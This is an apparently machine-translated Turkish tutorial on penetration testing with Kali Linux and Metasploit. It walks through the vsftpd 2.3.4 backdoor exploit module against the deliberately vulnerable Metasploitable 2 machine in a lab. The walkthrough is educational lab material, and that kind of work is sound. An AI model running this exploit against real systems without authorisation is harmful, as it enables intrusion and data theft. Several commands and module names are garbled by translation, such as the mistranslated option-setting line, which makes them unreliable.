Kali Linux ile sızma testi
İnternet, ağlara erişmek ve tespit edilmekten kaçınırken verilerini sömürmek isteyen kötü niyetli kişilerle doludur. Yalnızca güvenlik açıklarını ölçerek bir ağın güvenliğini sağlamak mantıklıdır. Penetrasyon testi veya etik korsanlık, bir bilgisayar korsanının erişim elde etmek için kullanabileceği tüm olası ihlalleri belirleyerek ve böylece güvenlik ihlallerini azaltarak ağları veya sunucuları ele geçirilebilir hedefler için nasıl test ettiğimizdir. Penetrasyon testleri genellikle, en popüleri Kali Linux olan yazılım uygulamaları aracılığıyla, tercihen Metasploit çerçevesiyle gerçekleştirilir. Kali Linux ile bir saldırı gerçekleştirerek bir sistemi nasıl test edeceğinizi öğrenmek için sonuna kadar kalın.
Kali Linux ve Metasploit çerçevesine giriş
Kali Linux Offensive Security tarafından geliştirilen (ve düzenli olarak güncellenen) birçok gelişmiş sistem güvenlik aracından biridir. Esas olarak sızma testi için tasarlanmış bir dizi araçla birlikte gelen Linux tabanlı bir işletim sistemidir. Kullanımı oldukça kolaydır (en azından diğer kalem testi programlarıyla karşılaştırıldığında) ve yeterli sonuçları sunacak kadar karmaşıktır.
NS Metasploit Çerçevesi güvenlik açıklarını test etmek için sistemlere saldırmak için kullanılan açık kaynaklı modüler bir penetrasyon testi platformudur. En yaygın kullanılan penetrasyon testi araçlarından biridir ve Kali Linux'ta yerleşik olarak gelir.
Metasploit, veri deposu ve modüllerden oluşur. Datastore, kullanıcının çerçeve içindeki özellikleri yapılandırmasına olanak tanırken, modüller Metasploit'in özelliklerini türettiği bağımsız kod parçacıklarıdır. Kalem testi için bir saldırı yürütmeye odaklandığımız için tartışmayı modüllere ayıracağız.
Toplamda beş modül vardır:
Faydalanmak – algılamadan kaçınır, sisteme girer ve faydalı yük modülünü yükler
yük – Kullanıcının sisteme erişmesine izin verir
Ek -sömürüyle ilgisi olmayan görevleri gerçekleştirerek ihlali destekler
Postalamak - Operasyon – zaten güvenliği ihlal edilmiş sisteme daha fazla erişime izin verir
NOP jeneratör – güvenlik IP'lerini atlamak için kullanılır
Amaçlarımız doğrultusunda, hedef sistemimize erişmek için Exploit ve faydalı yük modüllerini kullanacağız.
Kalem test laboratuvarınızı kurma
Aşağıdaki yazılıma ihtiyacımız olacak:
Kali Linux:
Kali Linux yerel donanımımızdan çalıştırılacaktır. İstismarları bulmak için Metasploit çerçevesini kullanacağız.
Bir hiper yönetici:
Oluşturmamıza izin verdiği için bir hiper yöneticiye ihtiyacımız olacak. sanal makine Bu, aynı anda birden fazla işletim sistemi üzerinde çalışmamızı sağlar. Sızma testi için önemli bir ön koşuldur. Pürüzsüz seyir ve daha iyi sonuçlar için ikisinden birini kullanmanızı öneririz. sanal kutu veya Microsoft Hyper-V üzerinde sanal makine oluşturmak için .
Metasploitable 2
Kali Linux'ta bir çerçeve olan Metasploit ile karıştırılmaması gereken metasploitable, siber güvenlik uzmanlarını eğitmek için programlanmış, kasıtlı olarak savunmasız bir sanal makinedir. Metasploitable 2, yararlanabileceğimiz tonlarca test edilebilir güvenlik açığına sahiptir ve web'de başlamamıza yardımcı olacak yeterli bilgi mevcuttur.
Güvenlik açıkları iyi belgelendiğinden Metasploitable 2'de sanal sisteme saldırmak kolay olsa da, sonunda penetrasyon testini gerçekleştireceğiniz gerçek makineler ve ağlar konusunda çok daha fazla uzmanlığa ve sabra ihtiyacınız olacak. Ancak kalem testi için metasploitable 2'yi kullanmak, yöntem hakkında bilgi edinmek için mükemmel bir başlangıç noktası görevi görür.
Kalem testimizi ilerletmek için metasploitable 2'yi kullanacağız. Bu sanal makinenin çalışması için çok fazla bilgisayar belleğine ihtiyacınız yok, 10 GB'lık bir sabit disk alanı ve 512 mbs'lik bir ram yeterli olacaktır. Yüklerken Metasploitable için ağ ayarlarını yalnızca ana bilgisayar bağdaştırıcısına değiştirdiğinizden emin olun. Kurulduktan sonra Metasploitable'ı başlatın ve oturum açın. Kali Linux'u başlatın, böylece Metasploit çerçevesinin testimizi başlatmak için çalışmasını sağlayabiliriz.
VSFTPD v2.3.4 Arka Kapı Komut Yürütmesinden Yararlanma
Her şey yerli yerindeyken, sonunda istismar edilecek bir güvenlik açığı arayabiliriz. Web'de farklı güvenlik açıkları arayabilirsiniz, ancak bu eğitimde VSFTPD v2.3.4'ün nasıl kullanılabileceğini göreceğiz. VSFTPD, çok güvenli bir FTP arka plan programı anlamına gelir. Bunu özenle seçtik çünkü izin istemeden Metasploitable'ın arayüzüne tam erişim sağlıyor.
Metasploit Konsolunu başlatın. Kali Linux'ta komut istemine gidin ve aşağıdaki kodu girin:
$sudomsfconsole 
Konsol şimdi açıkken şunu yazın:
$vsftpd'de ara 
Bu, yararlanmak istediğimiz güvenlik açığının yerini getirir. Seçmek için şunu yazın
$istismar kullan/unix/ftp/vsftpd_234_backdoor 
İstismarı başlatmak için daha fazla bilginin gerekli olduğunu görmek için şunu yazın
$seçenekleri göster 
Eksik olan herhangi bir önemli öneme sahip tek bilgi, onu sağlayacağımız IP'dir.
Yazarak metasploitable'daki IP adresini arayın
$ifconfig 
Komut kabuğunda
IP adresi ikinci satırın başında, şöyle bir şey
#giriş adresi:10.0.2.15 
Metasploit'i hedef sisteme yönlendirmek için bu komutu yazın ve istismara başlayın. Ben ipimi kullanıyorum ama bu bir hataya neden olacak, ancak farklı bir kurban IP'si kullanırsanız, istismardan sonuç alacaksınız.
$AyarlamakDİNLEMEK[kurban IP'si] 
Artık Metasploitable'a verilen tam erişim ile sistemde herhangi bir kısıtlama olmaksızın gezinebiliriz. Herhangi bir sınıflandırılmış veriyi indirebilir veya sunucudan önemli olan herhangi bir şeyi kaldırabilirsiniz. Bir blackhat'ın böyle bir sunucuya erişim kazandığı gerçek durumlarda, CPU'yu kapatarak, ona bağlı diğer bilgisayarların da çökmesine neden olabilirler.
İşleri toparlamak
Sorunlara tepki vermek yerine sorunları önceden ortadan kaldırmak daha iyidir. Sızma testi, ister tek bir bilgisayar makinesi ister tüm bir ağ olsun, sistemlerinizin güvenliği söz konusu olduğunda sizi birçok güçlükten kurtarabilir ve yetişebilir. Bunu akılda tutarak, kalem testi hakkında temel bilgilere sahip olmak yararlıdır. Metasploitable, güvenlik açıkları iyi bilindiğinden, temellerini öğrenmek için mükemmel bir araçtır, bu nedenle hakkında çok fazla bilgi vardır. Kali Linux ile yalnızca bir istismar üzerinde çalıştık, ancak bunları daha yakından incelemenizi şiddetle tavsiye ediyoruz.